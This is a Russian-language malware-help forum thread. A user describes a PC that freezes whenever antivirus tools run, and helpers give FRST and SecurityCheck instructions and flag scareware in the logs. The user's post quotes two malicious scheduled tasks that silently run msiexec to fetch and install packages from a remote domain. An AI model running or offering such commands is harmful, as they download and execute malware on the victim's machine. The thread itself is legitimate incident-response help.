Зависание компьютера при попытке скачать, установить антивирус
Здравствуйте, недавно обнаружил крайне неприятную вещь, а именно - зависание компьютера при поиске или скачивании антивирусного ПО. Антивируса на компе нет. Пытался чистить Cure It'ом, т.к это единственная утилита, которая запускается, полный поиск выдал лишь приложения, которые посчитал Unwanted, а это были утилита Auslogics BoostSpeed и её компоненты, её удаление ни к чему не привело, все также виснет. В безопасном режиме все работает прекрасно: утилиты работают, все скачивается и переходы по ссылкам тоже работают, вот только проверки утилитами Cure It и AVZ - по 0, ничего не находит, скачал в безопасном режиме Касперского, но при переходе в обычный режим и при попытке установить - установщик виснет намертво. Думал решить проблему проверкой утилитой AVZ в обычном режиме, но и она намертво зависает при запуске и при этом вешая процесс explorer.exe, а при попытке вызова Диспетчера задач появляется вовсе черный экран, в этом случае помогает только ребут. Есть также подозрения на зараженность системных процессов, об этом так сказал игровой лаунчер любезно предоставив пути к ним. В диспетчере есть эти процессы, когда я снимаю процесс "setup.exe" и нажимаю в лаунчере игры кнопку продолжить, может появиться уведомление о том, что и другой процесс заражен - svchost.exe и путь его C:\Windows\SysWOW64\svchost.exe , путь к "setup.exe" - C:\Windows\SysWOW64 Проверка этих двух файлов на Virustotal ни к чему не привела, все указывает на то, что это goodware. В планировщике задач обнаружил следующие задачи: 1. {13213D4D-59EF-2157-F198-2FBCF3648171} Действие - запуск программы "msiexec.exe" -q /package https://eryseefor.info/7bnmwxlbfysf.iau 2. {C7E28AF9-AC06-C9CD-D4F4-6BBAA83B88A6} Действие - запуск программы "msiexec.exe" -q /package https://eryseefor.info/ylhybalegdna.pxn AutoLogger тоже виснет, т.к открывается AVZ, что делает невозможным сбор логов. Рассчитываю на Вашу помощь.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Desteeerslav, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
Сохраните файл из вложения в папку с Farbar Recovery Scan Tool. fixlist.txt
Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сообщите, что с проблемой.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Установите Internet Explorer 11, даже если им не пользуетесь, это критически важный для безопасности компонент Windows.
Автоматическое обновление отключено
Дата установки обновлений: 2017-04-14 05:09:12
C того времени много критических патчей выпущено, стоит установить:
DLL-Files.com Fixer Внимание! Подозрение на демо-версию антишпионской программы, программы-оптимизатора или вымогателя - scareware, badware или rogueware. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
Unity Web Player v.5.3.8f2 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
SpyHunter4 Внимание! Подозрение на демо-версию антишпионской программы, программы-оптимизатора или вымогателя - scareware, badware или rogueware. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
Auslogics BoostSpeed 9 v.9.2.0.0 Внимание! Подозрение на демо-версию антишпионской программы, программы-оптимизатора или вымогателя - scareware, badware или rogueware. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.